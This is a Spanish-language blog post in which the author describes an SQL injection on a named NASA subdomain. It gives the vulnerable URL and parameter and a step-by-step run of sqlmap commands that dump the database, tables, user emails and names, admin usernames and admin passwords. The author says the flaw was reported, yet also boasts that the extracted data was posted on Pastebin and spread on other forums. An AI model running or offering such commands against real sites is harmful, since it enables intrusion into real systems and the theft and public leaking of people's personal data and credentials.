Hola, pues en esta entrada colocare algunas fotos de la Inyeccion SQL que realize a unos de los sub-dominios oficiales de la NASA, el bug lo encontré realizando unos testos a dichos sub-dominios, la cual fue en Marzo de este año.
Colocare las fotos con el fin de que ustedes vean que los sitios oficiales de la NASA no son tan seguros como aparentan ser, es por eso que algunos Hackers Chinos en el año 2011 lograron vulnerar el sitio oficial y también tomaron el control de los servidores de dicha organización.
Cabe resaltar que todo lo que publicare en esta entrada, ha sido respectivamente reportada a la NASA en su debido tiempo y tampoco es con el fin de desprestigiar a la misma.
Sitio web : http://ipp.gsfc.nasa.gov/
Link Vulnerable : /optimus/voting.php?id=70'
Vulnerabilidad: SQL Injection
Estado: Reportado
#################################################################################
Vulnerabilidad:
Explotando Vulnerabilidad desde el SQLMAP:
Base de Datos:
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 --dbs
Tablas:
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog --tables
Columnas:
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T hermes_users --columns
E-mails:
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T hermes_users -C email --dump
Nombres:
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T hermes_users -C name --dump
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T authors --columns
Usuario Admin:
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T authors -C username --dump
Password Admin:
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T authors -C password --dump
Los datos las publique en algunos PASTEBIN, y se extendio rápidamente en foros de otros paises.
Saludos.
Buenísimas las fotos y la información.
ResponderEliminarSaludos.
F0M3T.